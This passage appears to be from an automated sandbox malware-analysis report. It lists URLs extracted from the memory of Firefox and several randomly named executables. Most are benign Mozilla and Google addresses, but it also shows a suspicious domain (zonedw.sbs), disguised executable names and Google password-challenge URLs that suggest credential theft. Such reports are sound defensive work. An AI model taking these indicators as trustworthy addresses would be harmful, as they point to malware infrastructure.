                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://topsites.services.mozilla.com/cid/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.comcreateContentPrincipalFromOriginhttps://monitor.firefox.comupgradeTabs
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD6B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
                          Source: firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
                          Source: 4508a44a11.exe, 00000007.00000003.2353374719.0000000000735000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3456117135.000000000071F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2382303961.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD726000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/schemas/telemetry.jso
                          Source: firefox.exe, 00000018.00000002.3234540323.000001C7B0FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD726000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3309103375.000001C7B1967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchINHIBIT_PERSISTENT_CACHINGLOAD_DOCUMENT_NEEDS_COOKIEVALIDATE_ONCE_PER_S
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE3A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
                          Source: firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: 4508a44a11.exe, 00000007.00000002.3583042649.0000000003F20000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3273297679.0000000003776000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                          Source: firefox.exe, 0000001E.00000002.2741225467.0000028B8E0CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/J
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/Jdd
                          Source: 4508a44a11.exe, 00000007.00000002.3583042649.0000000003F20000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3273297679.0000000003776000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.3123017357.000000000BDFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: b6866cbf49.exe, 0000001B.00000002.3268782554.0000000000867000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                          Source: firefox.exe, 00000018.00000002.2770331590.0000000E948BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.orgo
                          Source: firefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2908490881.000001C7ACEB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD6B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.ca
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/processPendingFileChanges/
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                          Source: firefox.exe, 00000018.00000002.3494799791.000001C7B39BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3771627553.000027D1BD800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 00000018.00000002.3523724049.000001C7B3B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account
                          Source: firefox.exe, 00000018.00000002.2819442098.000001C7A2F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.co;
                          Source: firefox.exe, 0000001E.00000002.2735259561.0000028B8DE70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE3A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2811533571.000001C7A166B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2764481821.0000021311794000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2740173769.000002131163A000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3832692351.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3871254945.0000000001675000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3883388858.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3858125258.0000000001668000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3834143259.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3973448396.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000002.4008008188.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3978193341.000000000146F000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000002.4012046733.0000000001688000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3846804026.000000000165C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2735259561.0000028B8DE74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2737263058.0000028B8DE80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2737263058.0000028B8DE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 0000001A.00000002.2740173769.0000021311630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd#
                          Source: firefox.exe, 00000016.00000002.2542258512.00000141707AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2567779289.0000022F5227F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794762627.000001C7A12A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                          Source: firefox.exe, 0000001A.00000002.2740173769.000002131163A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd7
                          Source: firefox.exe, 00000018.00000002.3220756752.000001C7B0DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPOR0P
                          Source: firefox.exe, 00000018.00000002.2819442098.000001C7A2EAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3220756752.000001C7B0DDD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2764481821.0000021311794000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2740173769.0000021311630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2735259561.0000028B8DE74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2737263058.0000028B8DE80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: firefox.exe, 00000018.00000002.2811533571.000001C7A1603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdWc
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://a581
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/accountDOM_VK_WIN_OEM_FJ_TOUROKUfocusLastNavigableElementDOM_VK_OPEN_CURLY_BRACK
                          Source: firefox.exe, 00000018.00000002.3523724049.000001C7B3B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/firefoxview-brand-name
                          Source: firefox.exe, 00000018.00000002.3771627553.000027D1BD800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.comZ
                          Source: firefox.exe, 00000018.00000002.3771627553.000027D1BD800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.comorArrZ
                          Source: 4508a44a11.exe, 00000007.00000003.2352455173.0000000000728000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://zonedw.sbs
                          Source: 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3456117135.00000000007A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zonedw.sbs/
